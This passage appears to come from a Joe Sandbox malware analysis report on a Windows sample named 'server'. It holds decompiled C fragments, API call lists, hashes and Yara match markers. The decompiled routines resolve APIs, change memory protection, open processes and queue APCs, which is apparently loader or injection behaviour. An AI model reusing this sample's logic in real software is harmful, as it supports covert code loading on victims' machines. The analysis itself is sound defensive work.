                				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
                				return _t2;
                			}




                0x00401bb5
                0x00401bbb

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E004012FB(void* __eax) {
                				char _v8;
                				void* _v12;
                				void* __edi;
                				void* _t18;
                				long _t24;
                				long _t26;
                				long _t29;
                				intOrPtr _t40;
                				void* _t41;
                				void* _t42;
                				void* _t44;
                
                				_t41 = __eax;
                				_t16 =  *0x404180;
                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                				if(_t18 != 0) {
                					_t29 = 8;
                					goto L8;
                				} else {
                					_t40 = _v8;
                					_t29 = E00401BC4(_t33, _t40, _t41);
                					if(_t29 == 0) {
                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                						_t24 = E00401000(_t40, _t44); // executed
                						_t29 = _t24;
                						if(_t29 == 0) {
                							_t26 = E004014CF(_t44, _t40); // executed
                							_t29 = _t26;
                							if(_t29 == 0) {
                								_push(_t26);
                								_push(1);
                								_push(_t40);
                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                									_t29 = GetLastError();
                								}
                							}
                						}
                					}
                					_t42 = _v12;
                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                					E00401BA9(_t42);
                					L8:
                					return _t29;
                				}
                			}














                0x00401303
                0x00401305
                0x00401321
                0x00401332
                0x00401339
                0x00401397
                0x00000000
                0x0040133b
                0x0040133b
                0x00401345
                0x00401349
                0x0040134e
                0x00401351
                0x00401356
                0x0040135a
                0x0040135f
                0x00401364
                0x00401368
                0x0040136d
                0x0040136e
                0x00401372
                0x00401377
                0x0040137f
                0x0040137f
                0x00401377
                0x00401368
                0x0040135a
                0x00401381
                0x0040138a
                0x0040138e
                0x00401398
                0x0040139e
                0x0040139e

                APIs
                  • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                  • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                  • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                  • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                • GetLastError.KERNEL32(?,?), ref: 00401379
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                • String ID:
                • API String ID: 3135819546-0
                • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004D1FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004D1C63), ref: 004D1FDE
                  • Part of subcall function 004D1FCF: GetVersion.KERNEL32(?,004D1C63), ref: 004D1FED
                  • Part of subcall function 004D1FCF: GetCurrentProcessId.KERNEL32(?,004D1C63), ref: 004D2009
                  • Part of subcall function 004D1FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004D1C63), ref: 004D2022
                  • Part of subcall function 004D154D: RtlAllocateHeap.NTDLL(00000000,?,004D1477), ref: 004D1559
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004D1C8D
                • Sleep.KERNEL32(00000000,00000030), ref: 004D1CD4
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 004D1CFC
                • GetSystemDefaultUILanguage.KERNEL32 ref: 004D1D06
                • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 004D1D19
                • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D1D8E
                • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 004D1DA4
                • GetLastError.KERNEL32 ref: 004D1DB4
                • TerminateThread.KERNEL32(00000000,00000000), ref: 004D1DBE
                • SetLastError.KERNEL32(00000000), ref: 004D1DCA
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004D1DD7
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 004D1DE9
                • GetLastError.KERNEL32 ref: 004D1DF4
                • GetLastError.KERNEL32 ref: 004D1E05
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 1666582358-0
                • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction ID: 45e69bdcf5ca6e17dac6e30b90a81de70a4346a39a3ec92aaa1e25758f8ef9d4
                • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction Fuzzy Hash: CE51C071901614BBE720EFB59D58AAFBBBEAB45755B104027FD01E2360D738DE408BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401D68() {
                				void* _t1;
                				unsigned int _t3;
                				void* _t4;
                				long _t5;
                				void* _t6;
                				intOrPtr _t10;
                				void* _t14;
                
                				_t10 =  *0x404170;
                				_t1 = CreateEventA(0, 1, 0, 0);
                				 *0x40417c = _t1;
                				if(_t1 == 0) {
                					return GetLastError();
                				}
                				_t3 = GetVersion();
                				if(_t3 != 5) {
                					L4:
                					if(_t14 <= 0) {
                						_t4 = 0x32;
                						return _t4;
                					} else {
                						goto L5;
                					}
                				} else {
                					if(_t3 >> 8 > 0) {
                						L5:
                						 *0x40416c = _t3;
                						_t5 = GetCurrentProcessId();
                						 *0x404168 = _t5;
                						 *0x404170 = _t10;
                						_t6 = OpenProcess(0x10047a, 0, _t5);
                						 *0x404164 = _t6;
                						if(_t6 == 0) {
                							 *0x404164 =  *0x404164 | 0xffffffff;
                						}
                						return 0;
                					} else {
                						_t14 = _t3 - _t3;
                						goto L4;
                					}
                				}
                			}










                0x00401d69
                0x00401d77
                0x00401d7d
                0x00401d84
                0x00401ddb
                0x00401ddb
                0x00401d86
                0x00401d8e
                0x00401d9b
                0x00401d9b
                0x00401dd7
                0x00401dd9
                0x00000000
                0x00000000
                0x00000000
                0x00401d90
                0x00401d97
                0x00401d9d
                0x00401d9d
                0x00401da2
                0x00401db0
                0x00401db5
                0x00401dbb
                0x00401dc1
                0x00401dc8
                0x00401dca
                0x00401dca
                0x00401dd4
                0x00401d99
                0x00401d99
                0x00000000
                0x00401d99
                0x00401d97

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                • GetVersion.KERNEL32 ref: 00401D86
                • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .$GetProcAddress.$l
                • API String ID: 0-2784972518
                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction ID: 3016ce05ce8855db380bad6eded173ec707f94a4e12e42bac316a148406dd603
                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction Fuzzy Hash: 963117B6900609DFDB10CF99C890BAEBBF5FB48324F25408BD441A7351D775AA45CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction ID: c974dc4654c2c0b2856aceb322a8aa319b3ae388a02c1838a89238217a9a5fe3
                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction Fuzzy Hash: CF01A7767006048FDF21CF64C914BAB33F6EB86315F4544ABD50697342E778A9418B94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,004D167F,0000000A,?,?), ref: 004D1824
                • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 004D1884
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004D167F,0000000A), ref: 004D18AF
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004D167F,0000000A,?,?), ref: 004D18D0
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,004D167F,0000000A,?,?), ref: 004D18D8
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                • String ID:
                • API String ID: 2685682793-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: b5507e0572b1776e0b20debfb97180dfbd760393c7e717d7d3b133bc0d4b9638
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: D021C5B2A00108BFD710EFA4CC84EAE7BADEB54395F10403BFA05E73A0D67599459B68
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 004D2052
                • GetModuleHandleA.KERNEL32(00000000), ref: 004D2062
                • GetCommandLineW.KERNEL32 ref: 004D206D
                  • Part of subcall function 004D1C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004D1C8D
                  • Part of subcall function 004D1C58: Sleep.KERNEL32(00000000,00000030), ref: 004D1CD4
                  • Part of subcall function 004D1C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 004D1CFC
                  • Part of subcall function 004D1C58: GetSystemDefaultUILanguage.KERNEL32 ref: 004D1D06
                  • Part of subcall function 004D1C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 004D1D19
                • HeapDestroy.KERNEL32 ref: 004D2080
                • ExitProcess.KERNEL32 ref: 004D2087
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                • String ID:
                • API String ID: 1393419808-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: 38ecaadbc66c80bff04cf15aa83a87e00d1b4ff94f72fdd70f2b603fc71153f0
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 24E0B6B0803220ABC3216F71BE0CA4F7E28BB59B527000536FA06F2225CB384A41CA9C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004D1C63), ref: 004D1FDE
                • GetVersion.KERNEL32(?,004D1C63), ref: 004D1FED
                • GetCurrentProcessId.KERNEL32(?,004D1C63), ref: 004D2009
                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004D1C63), ref: 004D2022
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: 0b0d9f62cd618b27f4f226b4e6c084050677c8b3ed4ec54bf52641443e095708
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: DFF08CB06413009BEB519F78BF19B563F64A7A5752F000037E741FA2E4D7B48982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID:
                • API String ID: 1302938615-3916222277
                • Opcode ID: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
                • Instruction ID: 0b4e2962642302af5baa7ab99a723a4d0387960a43f5b709c9065034346dd514
                • Opcode Fuzzy Hash: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
                • Instruction Fuzzy Hash: 09919F35900229DADB319A64CD883EAB3B4AF54314F1402FED819776D2D7B95ECACF48
                Uniqueness

                Uniqueness Score: -1.00%